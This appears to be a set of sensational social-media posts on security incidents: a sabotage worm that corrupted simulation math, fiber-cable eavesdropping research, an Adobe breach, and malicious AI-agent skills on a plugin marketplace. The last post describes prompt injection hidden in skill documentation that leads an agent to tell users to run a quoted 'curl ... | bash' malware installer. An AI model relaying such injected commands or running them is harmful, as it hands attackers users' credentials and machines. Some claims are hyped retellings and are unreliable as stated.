turtlemoji

A 2005 state-designed worm designed to corrupt physics simulations sat undetected on VirusTotal for nearly a decade. Fast16, intercepted executable files at the kernel level and silently rewrote floating-point calculations to make them produce slightly wrong answers. Targets: high-precision engineering suites used for structural analysis, crash simulations, and physical process modeling, including LS-DYNA, a tool cited in reports on Iran's nuclear weapons research. The sabotage vector relied on deployment of the driver across a network via worm, corrupting calculations on every machine, and eliminating the possibility of cross-checking results against a clean system. Stuxnet got the documentary. Fast16 got twenty years of nothing. https://t.co/3qfJMziXVd

🚨 BREAKING: Your internet fiber cable is secretly listening to you right now. Researchers from hong kong just dropped a paper at NDSS 2026 showing how they can spy on your conversations through the fiber optics in your walls. They successfully turned ordinary Fiber-to-the-Home (FTTH) cables into hidden, long-range microphones. No laser bugs. No physical implants. No drilling through walls. Just the broadband cable that is already sitting in your living room or office. By connecting a commercially available Distributed Acoustic Sensing (DAS) system to one end of the fiber, they can measure microscopic vibrations caused by sound waves in the room. Then, they use AI to reconstruct those vibrations into crystal-clear speech. Through walls. From adjacent rooms. From up to 50 meters away. It was tested on actually deployed infrastructure. The attack cost is dropping. Commercial gear is all that is required if an attacker has access to the other end of the fiber connection. Millions of homes and offices have FTTH installed. And every single one is potentially exposed.

🚨‼️ BREAKING: Adobe has been breached by threat actor Mr. Raccoon, leaking 13 million support tickets with personal data, 15,000 employee records, all HackerOne submissions, internal documents and more. Mr. Raccoon gained access through an Indian BPO, first deploying a remote access tool on an employee, then phishing their manager. Mr. Raccoon told us: "They allowed you to export all tickets in one request from an agent."

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the https://t.co/akQxEk9lrb file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life